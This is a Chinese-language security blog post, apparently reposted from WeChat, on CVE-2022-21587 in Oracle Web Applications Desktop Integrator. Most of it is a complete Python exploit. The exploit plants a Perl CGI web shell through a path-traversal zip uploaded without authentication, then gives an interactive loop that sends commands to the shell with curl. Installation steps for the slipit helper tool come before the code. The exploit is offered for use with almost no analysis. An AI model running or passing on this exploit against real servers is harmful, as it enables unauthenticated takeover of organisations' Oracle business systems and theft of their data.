漏洞速递 | CVE-2022-21587漏洞(附EXP)
2023-2-10 18:25:53 Author: EchoSec(查看原文) 阅读量:206 收藏

0x01 前言

CVE-2022-21587漏洞允许未经身份验证的攻击者通过 HTTP 进行网络访问,从而破坏 Oracle Web Applications Desktop Integrator。成功利用此漏洞可导致 Oracle Web Applications Desktop Integrator 被接管

需要安装python3 slipit依赖

安装 slipit:1.git clone https://github.com/usdAG/slipit2.cd slipit3.python3 setup.py sdist4.pip3 install --user dist/*5.export PATH=/home/yourname/.local/bin:$PATH

0x02 Poc


#!/usr/bin/python3#POC by HMs#CVE-2022-21587
import requestsimport osimport sys

shell = ''' use CGI;print CGI::header( -type => 'text/plain' );my $cmd = CGI::http('HTTP_CMD');print system($cmd);exit 0;'''
def Write_Shell(): with open("txkFNDWRR.pl", "w") as f: f.writelines("%s \n" %(shell)) os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl") os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")
def exploit(): Write_Shell() host = sys.argv[1] if host.endswith == '/': url = host + 'OA_HTML/BneUploaderService?bne:uueupload=true' url_shell = host + '/OA_CGI/FNDWRR.exe' else: url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true' url_shell = host + '/OA_CGI/FNDWRR.exe' file = 't.uue' up = { 'text':(file,open(file, 'rb'), "multipart/mixed" ) } request = requests.post(url,files=up) if request.status_code == 200: print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n') print('`press q || Q || quit to exit !!!` \n\n') print('`exploit: python3 http|https://example.com` \n\n') while True: cmd = input("~shell[~]: ") if cmd == 'q' or cmd == 'quit' or cmd == 'Q': break else: os.system("curl -ks '%s' -H 'cmd: %s'" % (url_shell,cmd)) else: print('not vuln!')
if __name__ == '__main__': exploit()

0x03 漏洞分析参考


0x01 工具介绍


2、点击下方名片回复" 21587 "获取

文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487123&idx=1&sn=8d739d06ca89eec34e8aad33dcdcdcd3&chksm=fcdf528ccba8db9aef1ccb3ed580292082373bf3c4a6bc8944fcafaba2cdcd221dcb78b87b89#rd